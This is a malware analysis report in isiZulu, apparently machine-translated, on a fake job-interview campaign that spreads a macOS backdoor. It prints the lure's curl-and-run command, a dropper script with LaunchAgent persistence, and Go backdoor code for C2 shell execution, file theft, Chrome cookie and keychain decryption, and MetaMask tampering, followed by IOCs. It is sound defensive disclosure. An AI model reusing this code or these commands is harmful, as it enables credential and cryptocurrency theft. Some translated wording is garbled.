AmaCybercrooks Asebenzisa Uhlu Lwemisebenzi Okungelona Iqiniso Ukweba i-Crypto

Ibhalwe yithimba le-MacPaw's Moonlock Lab

Umkhankaso we-inthanethi oqhubekayo uqondise abafuna umsebenzi ngamawebhusayithi ezingxoxo mbumbulu, ubakhohlisa ukuthi balande i-barebones nokho esebenza kahle kakhulu. Ngokungafani nohlelo olungayilungele ikhompuyutha oluyinkimbinkimbi olusebenzisa amasu e-obfuscation, lokhu kuhlasela kuncike ekululameni—ukuletha ikhodi yomthombo eceleni kwe-Go binary, okuyenza ibe inkundla ehlukahlukene. Okuthinta kakhulu umzamo wayo wokuduna izimvume zesandiso se-Chrome esihlobene ne-cryptocurrency i-MetaMask, okungenzeka ikhiphe izikhwama zezisulu.

Umkhankaso usasebenza, izizinda ezintsha zibonakala njalo ziheha izisulu eziningi. Abacwaningi ngabanye bezokuphepha abaningi kanye nezinkampani, njenge I-SentinelOne , dmpdump , futhi I-ENKI WhiteHat , ishicilele ukuhlaziya okuhle kakhulu. Ithimba lethu lenze ucwaningo oluzimele, futhi kulesi sihloko, sabelana ngalokho esikutholile namasu okuzingela.

Ithimba le-Moonlock Lab laqala ukulandelela lolu hlelo olungayilungele ikhompuyutha ngo-Okthoba 9, 2024, lapho izingxenye zokuqala zomnyango ongemuva ziqala ukubonakala. I-backdoor wuhlobo lwesofthiwe enonya olucasha kusistimu futhi luvumele abalingisi abasabisayo ukuthi bakhiphe imiyalo bekude, njengokungathi bangabanikazi abasemthethweni bendawo yokusebenza. Lokhu kuhlasela kuvame ukusebenzisa lokho okubizwa ngamaseva e-C2 (Command and Control) ukuthumela nokwenza imiyalo.

Okwenza lokhu kuhlasela kuhluke kokunye esivame ukukubona ukuthi kuhlanganisa izigaba eziningi futhi kuklanyelwe ukuqhubeka emshinini wesisulu esikhundleni sokusebenzisa isibhamu esisodwa sokweba idatha. Ukubuka okuphelele kwezigaba zokuhlasela kungabonakala esithombeni esingezansi.

Intambo yokuqala eyakhiwe kahle ku-X esiyiqaphele ithunyelwe ngu @tayvano_ , owabelane ngolwazi mayelana nomkhankaso ononya okungenzeka ngokuyinhloko uqondise abathuthukisi besofthiwe abafuna imisebenzi ezinkampanini ze-blockchain.

' Ngokuvamile iqala "ngomuntu oqashayo" ovela enkampanini eyaziwa njenge-Kraken, MEXC, Gemini, Meta. Amabanga okukhokha + isitayela semiyalezo siyathandeka—ngisho nakulabo abangazingeleli ngokuzimisela. Ikakhulukazi nge-Linkedin. Futhi izingosi ezizimele, izingosi zemisebenzi, i-tg, i-discord, njll.

Ukuze uthole inguqulo yakamuva yalolu hlelo olungayilungele ikhompuyutha, bekubalulekile ukuqapha izizinda ezintsha ezisingatha amasayithi ezingxoxo ezingamanga. Ngale njongo, ithimba lethu lithembele ezinkomba ezimbili ezingashintshi lezi zizinda ezabelana ngazo:

• Iphethini ye-URL efanayo “/video-questions/create/” ilandelwa yi-ID enekhodi eqinile:

• Isithombe esifanayo ( logo.png ) emakhasini:

Ngisho noma ezinye izizinda ezisetshenziswe phakathi nalo mkhankaso zivalwa, ezintsha ziyaqhubeka nokuvela, kanye nesakamuva esisaxhunywe ku-inthanethi: smarthiretop[.]ku-inthanethi . Ithimba lethu libone izizinda ezisebenzayo ezingaphezu kuka-20 kusukela ngoNovemba 2024.

Ngemva kokuphenya izizinda, sithole ukuthi ezinye zazo zabelana ngekheli le-IP elifanayo. Lokhu kuvame ukwenzeka ngoba abahlaseli basebenzisa abahlinzeki bokusingatha amabhulethi, okuvumela izizinda eziningi ukuthi zisingathwe kuseva efanayo. Ukwengeza, ukusingathwa kwezizinda eziningi ku-IP eyodwa kwenza abalingisi abasabisayo bajikeleze izizinda ngaphandle kokushintsha ingqalasizinda ye-backend.

Le ngqalasizinda enonya isingathwe ezinsizeni ezehlukene ezisatshalaliswa emhlabeni wonke. Njengoba kukhonjisiwe kumephu engezansi, amaseva amaningi atholakala e-US, kanti amanye asabalele kwamanye amazwe.

Umyalo ononya othi labo okwaxoxwa nabo bacelwe ukuthi basebenzise izifihla-buso efasiteleni elivela lapho bevakashela iwebhusayithi eyingozi. Kuyikhodi ye-JS, ehlanganiswe kufayela elikhulu.39e5a388.js kuleli cala. Amagama wefayela anjalo ngokuvamile akhiqizwa kusetshenziswa i-hashing noma indlela yokunyathelisa ngeminwe phakathi nenqubo yokwakha yohlelo lokusebenza lwewebhu (Reference: https://urlscan.io/result/0ad23f64-4d61-49c8-8ed8-0d33a07419f4 ).

Elinye lala makhasi linaleli fayela elishumekiwe le-JS eline-SHA256 hash elandelayo:

• f729af8473bf98f848ef2dde967d8d301fb71888ee3639142763ebb16914c803

Singabona kalula ukuthi ngaphakathi kwefayela le-JS elakhiwe kunemiyalo efanayo izisulu ezicelwe ukuthi ziyifake:

Ngemva kokuqonda ukuthi umlingisi osongelayo ulusakaza kanjani uhlelo olungayilungele ikhompuyutha, umgomo wethu oyinhloko bekuwukuthola ngokushesha amasampula nokuthuthukisa amasiginesha kubasebenzisi bethu. Ukushiwo okuqondile kokuqala kwamasampuli "alungele ukukhiqiza" namaheshi awo e-SHA-256 esiwatholile bekulolu chungechunge:

https://x.com/dimitribest/status/1873343968894689472 .

Yayihlanganisa ama-hashe amahlanu, okungukuthi:

• 96e78074218a0f272f7f94805cabde1ef8d64ffb *file.zip;
• 86dea05a8f40cf3195e3a6056f2e968c861ed8f1 *nodejs.zip;
• 321972e4e72c5364ec1d5b9e488d15c641fb1819 *nvidia-real.zip;
• 3405469811bae511e62cb0a4062aadb523cad263 *VCam_arm64.zip;
• c0baa450c5f3b6aacde2807642222f6d22d5b4bb *VCam_intel.zip.

Ngaphezu kwalokhu, ithimba lethu laqala ukulanda imibhalo eyingozi njengokungathi sikhohliswe ukuthi siyilande, efana nezisulu. Ngesinye isikhathi, kwasetshenziswa umyalo olandelayo kumawebhusayithi ezingxoxo ezingamanga:

Umyalo ovela kusithombe-skrini (ungasayinzi!):

 sudo sh -c 'curl -k -o /var/tmp/ffmpeg.sh https://api.nvidia-release.org/ffmpeg-ar.sh && chmod +x /var/tmp/ffmpeg.sh && nohup bash /var/tmp/ffmpeg.sh >/dev/null 2>&1 &'

Lenza izenzo ezibalwe ngezansi:

• Ilanda ifayela le-ffmpeg-ar.sh ku-api[.]i-nvidia-release[.]org;
• Igcina ku-/var/tmp/ffmpeg.sh;
• Isebenzisa ifayela futhi iqondise kabusha konke okukhiphayo ku-/dev/null ukuze ilifihle kumsebenzisi.

Ngaphakathi kwefayela elithi ffmpeg.sh elondolozwe kufolda yesikhashana, singathola indawo yokungena yalokhu kuhlasela, okuhlanganisa:

• Ilanda amafayela e-ZIP esiteji sesibili anomthwalo okhokhelwayo;
• Ukubeka ifayela le-PLIST kanye nesevisi yokubhalisa ukuphikelela;
• Ukwenza ukuhlanza.

Njengoba singabona kusikripthi esingezansi, yakhelwe ngokukhethekile i-macOS, kokubili ukuhluka kwe-Intel ne-ARM. Ngemuva kokuthi ichaze imodeli ye-CPU yamanje, ilanda ingobo yomlando ye-ZIP enamafayela amaningi. Ukubuyekezwa okuningiliziwe kwalesi script kungatholakala kokuthi le bhulogi , njengoba kushiwo yi-SentinelOne kweyabo umbiko wakamuva .

 #!/bin/bash # Define variables for URLs ZIP_URL_ARM64="https://api.nvidia-cloud.online/VCam1.update" ZIP_URL_INTEL="https://api.nvidia-cloud.online/VCam2.update" ZIP_FILE="/var/tmp/VCam.zip" # Path to save the downloaded ZIP file WORK_DIR="/var/tmp/VCam" # Temporary directory for extracted files EXECUTABLE="vcamservice.sh" # Replace with the name of the executable file inside the ZIP APP="ChromeUpdateAlert.app" # Replace with the name of the app to open PLIST_FILE=~/Library/LaunchAgents/com.vcam.plist # Path to the plist file # Determine CPU architecture case $(uname -m) in arm64) ZIP_URL=$ZIP_URL_ARM64 ;; x86_64) ZIP_URL=$ZIP_URL_INTEL ;; *) exit 1 ;; # Exit for unsupported architectures esac # Create working directory mkdir -p "$WORK_DIR" # Function to clean up cleanup() { rm -rf "$ZIP_FILE" } # Download, unzip, and execute if curl -s -o "$ZIP_FILE" "$ZIP_URL" && [[ -f "$ZIP_FILE" ]]; then unzip -o -qq "$ZIP_FILE" -d "$WORK_DIR" if [[ -f "$WORK_DIR/$EXECUTABLE" ]]; then chmod +x "$WORK_DIR/$EXECUTABLE" else cleanup exit 1 fi else cleanup exit 1 fi # Step 4: Register the service mkdir -p ~/Library/LaunchAgents cat > "$PLIST_FILE" <<EOL <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd"> <plist version="1.0"> <dict> <key>Label</key> <string>com.vcam</string> <key>ProgramArguments</key> <array> <string>$WORK_DIR/$EXECUTABLE</string> </array> <key>RunAtLoad</key> <true/> <key>KeepAlive</key> <false/> </dict> </plist> EOL chmod 644 "$PLIST_FILE" if ! launchctl list | grep -q "com.vcam"; then launchctl load "$PLIST_FILE" fi # Step 5: Run ChromeUpdateAlert.app if [[ -d "$WORK_DIR/$APP" ]]; then open "$WORK_DIR/$APP" & fi # Final cleanup cleanup

Ireferensi: I-VirusTotal

Okuqukethwe kwengobo yomlando (inguqulo ye-Intel CPU) elandelwa iskripthi kubalwe ngezansi:

Wonke amafayela akungobo yomlando angahlukaniswa ngamaqembu ambalwa:

• Izingxenye zekhodi yomthombo we-Go kanye namabhanari ayo ( https://github.com/golang/go )
• I-ChromeUpdateAlert.app – I-AppBundle equkethe kanambambili ye-Mach-O eqoqa i-IP yomsebenzisi nephasiwedi
• Isicabha esingemuva esibhalwe phansi kanye nesigebengu
• vcamservice.sh - Iskripthi esethula ifayela elisebenzisekayo elisuselwa ku-Go

Kuyathakazelisa ukuthi ingobo yomlando ilinganiselwa ku-75 MB ngosayizi, ikakhulukazi ngoba ihlanganisa izingxenye eziningi zamalabhulali e-Go esemthethweni namabhanari.

Ukuhlaziywa Kokwebiwa Kwephasiwedi kwe-Mach-O

Elinye lamafayela esiwabone esetshenziswa isikhathi eside kulokhu kuhlasela kanambambili ye-Mach-O yendawo yonke enezakhiwo ezi-2, ebizwa nge-CameraAccess ( SHA256: 3c4becde20e618efb209f97581e9ab6bf00cbd63f51f7ac2 7ed59 ).

Izenza isithonjana se-Google Chrome, okwenza abasebenzisi abavamile bakholelwe ukuthi ifayela lisemthethweni futhi libavimbela ekulisuseni.

Ikhodi ibhalwe nge-Swift, futhi awekho amasu e-obfuscation aqinile atholakele, okwenza kube lula ukuqonda ukugeleza kokubulawa.

Ibonisa iwindi elibukeka njengewindi lesaziso sesistimu, licela umsebenzisi ukuthi anikeze ukufinyelela kwemakrofoni, okucelwe kuhlelo lokusebenza lwe-Google Chrome.

Ngisho noma umsebenzisi ekhetha okuthi "Ngikhumbuze Kamuva," iwindi lokwaziswa kwephasiwedi lisavela.

Uhlelo lokusebenza luthi ludinga ukufinyelela kwemakrofoni; nokho, ifakwe ebhokisini lesandbox, futhi asikho isicelo semvume sangempela esenzelwe imakrofoni.

Ngemuva kokuthi umsebenzisi efake iphasiwedi yakhe, uhlelo olungayilungele ikhompuyutha lucela ikheli le-IP langaphandle lomsingathi elisebenza kulo. Ibese ithumela ifayela le-password.txt kufolda eyiDropbox eqanjwe ngekheli le-IP langaphandle lomsebenzisi.

Kusithombe-skrini esingezansi i-Dropbox API URL ingabonwa.

Ngenkathi sihlola ithrafikhi yenethiwekhi, singabona imizamo yokuthola ikheli le-IP lomphakathi lomuntu ohlukumezekile.

Ngemuva kokuthi ikheli lasesizindeni se-inthanethi lamukelwe, singabona izicelo ku-Dropbox ukuze silayishe ipheya ye-IP-password sisebenzisa izifakazelo ezinamakhodi aqinile.

Ithimba lethu libike lesi sigameko ku-Dropbox, kanye nemininingwane esetshenziswe ukwenza lo mkhankaso wokuhlukumeza.

Ukuhlaziywa kwe-Go-written backdoor

Kubalulekile ukuqaphela ukuthi ifayela le-ZIP elandwe ngeskripthi se-ffmpeg.sh liqukethe ikhodi yomthombo wombhalo osobala we-backdoor, okusho ukuthi alizange lihlanganiswe ngaphambili noma libe ne-obfuscated. Kusheshise kakhulu ukuhlaziya kodwa futhi kwaphakamisa imibuzo mayelana nokuchazwa okufanele. Akudingeki ukusho, amaqembu e-APT asuka e-DPRK avamise ukuba yinkimbinkimbi kakhulu.

Elinye isu elingajwayelekile ukufakwa kwe-Go kanambambili ( /bin/go ) kungobo yomlando esikhundleni sokumane uhlanganise ikhodi egcwele. Kodwa-ke, njengoba i-Go kungelona uhlelo lokusebenza oluzenzakalelayo kumasistimu amaningi wokusebenza, abalingisi abasabisayo kungenzeka bayifake ukuze ihambisane kangcono. Lokhu kunengqondo uma kunikezwe ukuthi uhlelo olungayilungele ikhompuyutha luyi-cross-platform futhi luqondise i-macOS, Linux, neWindows ngasikhathi sinye.

Igrafu ebonisa ubudlelwano nencazelo enemininingwane yesampula ngayinye ephawulekayo, ingatholakala lapha: Umbono

Indawo yokungena

Ngaphakathi kwengobo yomlando, kuneskripthi esibizwa ngokuthi vcampdate.sh . Isebenza ngokushesha ngemva kokukhipha impahla bese imane isebenzise okuthi /bin/go (okugoqwa ku-ZIP) kuyilapho idlula indlela eya kuhlelo lokusebenza oluyinhloko lwe-Golang ( app.go kuleli cala).

 #!/bin/bash # Set the working directory to the folder where this script is located cd "$(dirname "$0")" echo "Installing Dependencies..." project_file="app.go" ./bin/go run "$project_file" exit 0

Uhlelo lokusebenza lokufaka ( app.go ) lunesibopho sokukhiqiza i-UUID ehlukile yendawo yokusebenza yomsebenzisi, iqalise i-C2 URL, futhi iqale iluphu eyinhloko. Ekhodini singabona amazwana omugqa owodwa, amaphrinti emilayezo esekelayo, kanye nekhodi ethile enamazwana. Kuphinde kuhlanganise nama-URL okungenzeka ahloselwe ukuhlolwa, akhohlwe ukususwa onjiniyela. Naphezu kokuthi ikheli le-C2 IP lihlukile kumkhankaso omkhulu, amasampula asuka ku-2024 abelane ngokusebenza okufanayo futhi akhombe idatha efanayo.

Kamuva ucingo oluya ku- core.StartMainLoop(id, url) isiletha kumongo/ ifolda enamafayela we- loop.go nawe -work.go . Ifayela le -loop.go linesibopho ngokuyinhloko sokwamukela nokusebenzisa imiyalo evela ku-C2, ishayela amamojula amancane aqoqa idatha ebucayi, futhi ayilayishe kuseva ekude. Iqukethe imisebenzi eminingi, engu-8 esingathanda ukuyigqamisa futhi siyihlole kabanzi.

Umsebenzi StartMainLoop

Lo msebenzi usebenzisa i-config submodule ukuze uqalise imiyalo etholakalayo futhi ulalele engenayo. Ngezansi ungathola ithebula elinayo yonke imiyalo kanye namakhodi ahambisanayo. Ukuhlaziywa okunemininingwane eminingi yokusebenza kwe-backdoor kungatholakala ku lolu shicilelo .

Ngokusekelwe emyalweni owamukelwe kwa-C2, umsebenzi ofanelekile uzobizwa.

 func StartMainLoop(id string, url string) { var ( msg_type string msg_data [][]byte msg string cmd string cmd_type string cmd_data [][]byte alive bool ) // initialize cmd_type = config.COMMAND_INFO alive = true for alive { func() { // recover panic state defer func() { if r := recover(); r != nil { cmd_type = config.COMMAND_INFO time.Sleep(config.DURATION_ERROR_WAIT) } }() switch cmd_type { case config.COMMAND_INFO: msg_type, msg_data = processInfo() case config.COMMAND_UPLOAD: msg_type, msg_data = processUpload(cmd_data) case config.COMMAND_DOWNLOAD: msg_type, msg_data = processDownload(cmd_data) case config.COMMAND_OSSHELL: msg_type, msg_data = processOsShell(cmd_data) case config.COMMAND_AUTO: msg_type, msg_data = processAuto(cmd_data) case config.COMMAND_WAIT: msg_type, msg_data = processWait(cmd_data) case config.COMMAND_EXIT: alive = false msg_type, msg_data = processExit() default: panic("problem") } msg = command.MakeMsg(id, msg_type, msg_data) cmd, _ = transport.HtxpExchange(url, msg) cmd_type, cmd_data = command.DecodeMsg(cmd) }() } }

Umsebenzi processInfo

Lo msebenzi uzoqoqa ulwazi lwesistimu oluyisisekelo njengegama lomsebenzisi, igama lomethuleli, inguqulo ye-OS, nezakhiwo. Kuhle ukuqaphela ukuthi iningi lama-infostealers adumile aqoqa ulwazi lwesistimu oluningi kunalolu hlelo olungayilungele ikhompuyutha.

 func processInfo() (string, [][]byte) { user, _ := user.Current() host, _ := os.Hostname() os := runtime.GOOS arch := runtime.GOARCH print("user: " + user.Username + ", host: " + host + ", os: " + os + ", arch: " + arch + "\n") data := [][]byte{ []byte(user.Username), []byte(host), []byte(os), []byte(arch), []byte(config.DAEMON_VERSION), } return config.MSG_INFO, data }

Umsebenzi wenquboLayisha

Kulesi simo, ukulayisha kumelela inqubo yokuthumela ifayela eligciniwe kusuka ku-C2 kuya kumsingathi onegciwane, okulandelwa ukuwohloka kwalo. Iphinde ikhombise ukuthi ngabe ukuwohloka kuphumelele yini.

 func processUpload(data [][]byte) (string, [][]byte) { var log string var state string path := string(data[0]) buf := bytes.NewBuffer(data[1]) err := util.Decompress(buf, path) if err == nil { log = fmt.Sprintf("%s : %d", path, len(data[1])) state = config.LOG_SUCCESS } else { log = fmt.Sprintf("%s : %s", path, err.Error()) state = config.LOG_FAIL } return config.MSG_LOG, [][]byte{ []byte(state), []byte(log), } }

Inqubo yomsebenziLanda

Lo msebenzi uphambene nowangaphambilini. Icindezela uhla lwemibhalo ngamafayela aqoqwe kusenesikhathi endaweni yomlando ye-tar.gz.

 func processDownload(data [][]byte) (string, [][]byte) { var file_data []byte var err error path := string(data[0]) _, file := filepath.Split(path) info, _ := os.Stat(path) if info.IsDir() { var buf bytes.Buffer err = util.Compress(&buf, []string{path}, false) file = fmt.Sprintf("%s.tar.gz", file) file_data = buf.Bytes() } else { file_data, err = os.ReadFile(path) } if err == nil { return config.MSG_FILE, [][]byte{[]byte(config.LOG_SUCCESS), []byte(file), file_data} } else { return config.MSG_FILE, [][]byte{[]byte(config.LOG_FAIL), []byte(err.Error())} } }

Umsebenzi we-OsShell

Lona umsebenzi okufanele ube nomnyango ongemuva wangempela. Ilinda umyalo ongafanele futhi izame ukuwenza. Umyalo ungase ube nezimpikiswano zomugqa womyalo, futhi okukhiphayo kuzofakwa ngokuqondile ku-C2.

 func processOsShell(data [][]byte) (string, [][]byte) { mode := string(data[0]) // mode timeout, _ := strconv.ParseInt(string(data[1]), 16, 64) shell := string(data[2]) args := make([]string, len(data[3:])) for index, elem := range data[3:] { args[index] = string(elem) } if mode == config.SHELL_MODE_WAITGETOUT { // wait and get result mode ctx, cancel := context.WithTimeout(context.Background(), time.Duration(timeout)) defer cancel() cmd := exec.CommandContext(ctx, shell, args...) out, err := cmd.Output() if err != nil { return config.MSG_LOG, [][]byte{ []byte(config.LOG_FAIL), []byte(err.Error()), } } else { return config.MSG_LOG, [][]byte{ []byte(config.LOG_SUCCESS), out, } } } else { // start and detach mode c := exec.Command(shell, args...) err := c.Start() if err != nil { return config.MSG_LOG, [][]byte{ []byte(config.LOG_FAIL), []byte(err.Error()), } } else { return config.MSG_LOG, [][]byte{ []byte(config.LOG_SUCCESS), []byte(fmt.Sprintf("%s %s", shell, strings.Join(args, " "))), } } } }

Umsebenzi processAuto

Leli iphoyinti lokungena lokugeleza kokweba. Lo msebenzi uqukethe izingcingo eziningi eziya kumafayela atholakala ku-auto/ifolda. Kubandakanya abathwebuli, abacubungula noma abalungisi bedatha elandelayo:

• I-keychain
• Idatha yokungena ye-Chrome
• Amakhukhi e-Chrome
• Isandiso se-Chrome MetaMask (okhiye, izimvume, njll.)
• Iphrofayela ye-Chrome

 func processAuto(data [][]byte) (string, [][]byte) { var ( msg_type string msg_data [][]byte ) mode := string(data[0]) switch mode { case config.AUTO_CHROME_GATHER: msg_type, msg_data = auto.AutoModeChromeGather() case config.AUTO_CHROME_PREFRST: msg_type, msg_data = auto.AutoModeChromeChangeProfile() case config.AUTO_CHROME_COOKIE: msg_type, msg_data = auto.AutoModeChromeCookie() case config.AUTO_CHROME_KEYCHAIN: msg_type, msg_data = auto.AutoModeMacChromeLoginData() default: msg_type = config.MSG_LOG msg_data = [][]byte{[]byte(config.LOG_FAIL), []byte("unknown auto mode")} } return msg_type, msg_data }

Inqubo yokusebenzaLinda

Umsebenzi osetshenziswayo osetshenziselwa ukuthumela i-backdoor kumodi yokulala, ilinde eminye imiyalo.

 func processWait(data [][]byte) (string, [][]byte) { duration, _ := strconv.ParseInt(string(data[0]), 16, 64) time.Sleep(time.Duration(duration)) send_data := make([]byte, 128) rand.Read(send_data) return config.MSG_PING, [][]byte{send_data} }

Inqubo yomsebenziPhuma

Lona umsebenzi osetshenziswayo osetshenziselwa ukuyeka iluphu eyinhloko yokuxhumana ne-C2.

 func processExit() (string, [][]byte) { return config.MSG_LOG, [][]byte{ []byte(config.LOG_SUCCESS), []byte("exited"), } }

Ukwenziwa kokuqoqwa kwedatha ye-Chrome ngokuzenzakalela

I- auto/ ifolda iqukethe isethi ye-Go-apps:

• okuyisisekelo.hamba

   const ( userdata_dir_win = "AppData\\Local\\Google\\Chrome\\User Data\\" userdata_dir_darwin = "Library/Application Support/Google/Chrome/" userdata_dir_linux = ".config/google-chrome" extension_dir = "nkbihfbeogaeaoehlefnkodbefgpgknn" extension_hash_key = "protection.macs.extensions.settings.nkbihfbeogaeaoehlefnkodbefgpgknn" extension_setting_key = "extensions.settings.nkbihfbeogaeaoehlefnkodbefgpgknn" secure_preference_file = "Secure Preferences" logins_data_file = "Login Data" keychain_dir_darwin = "Library/Keychains/login.keychain-db" )

  • Lapha singabona ama-constants achaziwe anedatha eqondiwe ukuze sithwebule, kuba sobala ukuthi okugxilwe kakhulu kusandiso se-MetaMask.

• chrome_change_pref.go

   // get json string func getExtJsonString() string { return `{"active_permissions":{"api": ["activeTab","clipboardWrite","notifications","storage","unlimitedStorage","webRequest"], "explicit_host":["*://*.eth/*","http://localhost:8545/*","https://*.codefi.network/*","https://*.cx.metamask.io/*","https://*.infura.io/*","https://chainid.network/*","https://lattice.gridplus.io/*"], "manifest_permissions":[], "scriptable_host":["*://connect.trezor.io/*/popup.html","file:///*","http://*/*","https://*/*"]}, "commands":{"_execute_browser_action":{"suggested_key":"Alt+Shift+M","was_assigned":true}},"content_settings":[], "creation_flags":38,"events":[],"first_install_time":"13361518520188298","from_webstore":false, "granted_permissions":{"api":["activeTab","clipboardWrite","notifications","storage","unlimitedStorage","webRequest"], "explicit_host":["*://*.eth/*","http://localhost:8545/*","https://*.codefi.network/*","https://*.cx.metamask.io/*","https://*.infura.io/*","https://chainid.network/*","https://lattice.gridplus.io/*"], "manifest_permissions":[],"scriptable_host":["*://connect.trezor.io/*/popup.html","file:///*","http://*/*","https://*/*"]},"incognito_content_settings":[], "incognito_preferences":{},"last_update_time":"13361518520188298","location":4,"newAllowFileAccess":true,"path":"C:\\ProgramData\\11.16.0_0","preferences":{}, "regular_only_preferences":{},"state":1,"was_installed_by_default":false,"was_installed_by_oem":false,"withholding_permissions":false}` }

   // chrome kill if runtime.GOOS == "windows" { cmd := exec.Command("cmd", "/c", "taskkill /f /im chrome.exe") cmd.Run() } else { cmd := exec.Command("/bin/sh", "-c", "killall chrome") cmd.Run() }

  • Ibulala zonke izinqubo ze-Chrome ezisebenzayo njengamanje, futhi ishintsha izimvume ezithile zesandiso se-MetaMask .
  • Ukulungiselelwa kwe-JSON kuphakamisa ukuziphatha okunamandla kwesandiso ngenxa yezimvume zaso ezibanzi nendlela yokufaka mathupha.
  • Imvume " yesicelo sewebhu " ivumela isandiso ukuthi sibambe futhi silungise izicelo zenethiwekhi, sivumela ukuntshontshwa kwedatha noma ukuhlaselwa kobugebengu bokweba imininingwane ebucayi. Imvume ethi " ClipboardWrite " ingasetshenziselwa ukuthwebula nokuguqula idatha yebhodi lokunamathisela, okungenzeka kwebiwe amakheli e-cryptocurrency noma amagama ayimfihlo.
  • Isigaba esithi " scriptable_host ", esihlanganisa " ifayela:///* ", " https://*/* ", kanye " http://*/* ", sivumela ukwenziwa kombhalo kuwo wonke amawebhusayithi kanye nokufinyelela kumafayela endawo, okuvumela ukwebiwa kwemininingwane noma ukukhishwa kwedatha okungagunyaziwe.
  • Isigaba esithi " explicit_host " sinikeza ukufinyelela ezizindeni ezihlobene ne-cryptocurrency, njenge -https://*.infura.io/* kanye ne -https://*.cx.metamask.io/* , engase isetshenziselwe ukukhohlisa okwenziwayo.
  • I-" from_webstore ": inkambu engamanga ibonisa ukuthi isandiso safakwa mathupha noma ngezindlela ezingagunyaziwe, okuphakamisa ukuphazamisa okungase kube khona. Inkambu ethi " imiyalo " inika isinqamuleli sekhibhodi ukuze senze isandiso sisebenze, okungenzeka sibangele ukuziphatha okunonya okufihliwe.
  • Lezi zici ezihlanganisiwe zibonisa ukuthi isandiso singasetshenziselwa ukufinyelela okungagunyaziwe, ukwebiwa kwedatha, noma ukukhwabanisa kwezezimali.

• chrome_cookie_darwin.go

   var ( SALT = "saltysalt" ITERATIONS = 1003 KEYLENGTH = 16 ) func getDerivedKey() ([]byte, error) { out, err := exec.Command( `/usr/bin/security`, `find-generic-password`, `-s`, `Chrome Safe Storage`, `-wa`, `Chrome`, ).Output() if err != nil { return nil, err } temp := []byte(strings.TrimSpace(string(out))) chromeSecret := temp[:len(temp)-1] if chromeSecret == nil { return nil, errors.New("Can not get keychain") } var chromeSalt = []byte("saltysalt") // @https://source.chromium.org/chromium/chromium/src/+/master:components/os_crypt/os_crypt_mac.mm;l=157 key := pbkdf2.Key(chromeSecret, chromeSalt, 1003, 16, sha1.New) return key, nil }

  • Isetshenziselwa ukubuyisa iphasiwedi ehlobene ne-Google Chrome kusitoreji sasendaweni.
  • Iqoqa idatha ye-Keychain nesitoreji esengeziwe ku- hallchain.tar.gz .

• chrome_cookie_other.go

  • Kuyafana kodwa ngeLinux.

• chrome_cookie_win.go

  • Okufanayo kodwa ngeWindows.

• chrome_gather.go

   func AutoModeChromeGather() (string, [][]byte) { print("=========== AutoModeChromeGather ===========", runtime.GOOS, "\n") var ( buf bytes.Buffer userdata_dir string path_list []string ) // gather userdata_dir = getUserdataDir() // file system search _ = filepath.Walk(userdata_dir, func(path string, info os.FileInfo, err error) error { if info.Name() == extension_dir && strings.Contains(path, "Local Extension Settings") { path_list = append(path_list, path) } return nil }) _ = util.Compress(&buf, path_list, true) print("=========== End ===========\n") // return data := make([][]byte, 3) data[0] = []byte(config.LOG_SUCCESS) data[1] = []byte("gather.tar.gz") data[2] = buf.Bytes() msg_type := config.MSG_FILE return msg_type, data

  • Iqoqa izilungiselelo zesandiso zasendaweni (uma zikhona kusistimu) futhi zipake ku- gather.tag.gz

Iziphetho

Ukuphetha ukuhlaziya kwethu, kufanele sigqamise amaphuzu abaluleke kakhulu:

• Ngemuva kokwebiwa kwephasiwedi okuyimpumelelo, indawo yokusebenza yesisulu ingafinyelelwa ukude nge-C2 ukuze kwebiwe idatha eyengeziwe, okuhlanganisa namafayela omuntu siqu agcinwe ohlelweni. Kwenza le ndlela yohlelo olungayilungele ikhompuyutha ibe yingozi kakhulu kunezigebengu ezivamile ezivame ukusebenza ohlelweni kanye, ziqoqa kuphela amafayela asohlwini lwazo.
• Ikhodi ye-Backdoor ibhalwe ngokuvumelana nezinqubo ezihamba phambili zokuhlela, ukuphawula kushiywa njengoba kunjalo, okushiya umbuzo ovulekile wokuthi kungani ikhodi ingahlanganiswanga ngaphambili.
• Kuqondiswe isandiso esisodwa kuphela esihlobene ne-cryptocurrency, cishe kubalwa ekutholeni ukufinyelela kude ukuze useshe mathupha amanye amathuluzi e-crypto adumile kanye nedatha ebucayi ohlelweni.
• Lo mkhankaso usaqhubeka, okubonisa ukuthi isu labalingiswa abasabisayo lihlala lisebenza futhi alidingi izinguquko ezisheshayo. Kodwa-ke, sikholwa ukuthi imikhankaso efanayo ingase ivele maduze nengqalasizinda ebuyekeziwe.

I-IOC

Izizinda

 app.blockchain-checkup[.]com app.hiring-interview[.]com app.quickvidintro[.]com app.skill-share[.]org app.vidintroexam[.]com app.willo-interview[.]us app.willohiringtalent[.]org app.willorecruit[.]com app.willotalent[.]pro app.willotalentes[.]com app.willotalents[.]org blockchain-assess[.]com digitpotalent[.]com digitptalent[.]com fundcandidates[.]com hiringinterview[.]org hiringtalent[.]pro interviewnest[.]org smarthiretop[.]online talentcompetency[.]com topinnomastertech[.]com web.videoscreening[.]org willoassess[.]com willoassess[.]net willoassess[.]org willoassessment[.]com willocandidate[.]com willointerview[.]com willomexcvip[.]us winterviews[.]net winyourrole[.]com wtalents[.]in wtalents[.]us wholecryptoloom[.]com

I-SHA256

 b72653bf747b962c67a5999afbc1d9156e1758e4ad959412ed7385abaedb21b6 60ec2dbe8cfacdff1d4eb093032b0307e52cc68feb1f67487d9f401017c3edd7 5df555b868c08eed8fea2c5f1bc82c5972f2dd69159b2fdb6a8b40ab6d7a1830 3c4becde20e618efb209f97581e9ab6bf00cbd63f51f4ebd5677e352c57e992a 3210d821e12600eac1b9887860f4e63923f624643bc3c50b3600352166e66bfe b2a4a981ba7cc2add74737957efdfcbd123922653e3bb109aa7e88d70796a340 3697852e593cec371245f6a7aaa388176e514b3e63813fdb136a0301969291ea 0a49f0a8d0b1e856b7d109229dfee79212c10881dcc4011b98fe69fc28100182

C2

 hxxp://216.74.123.191:8080 hxxp://95.169.180.146:8080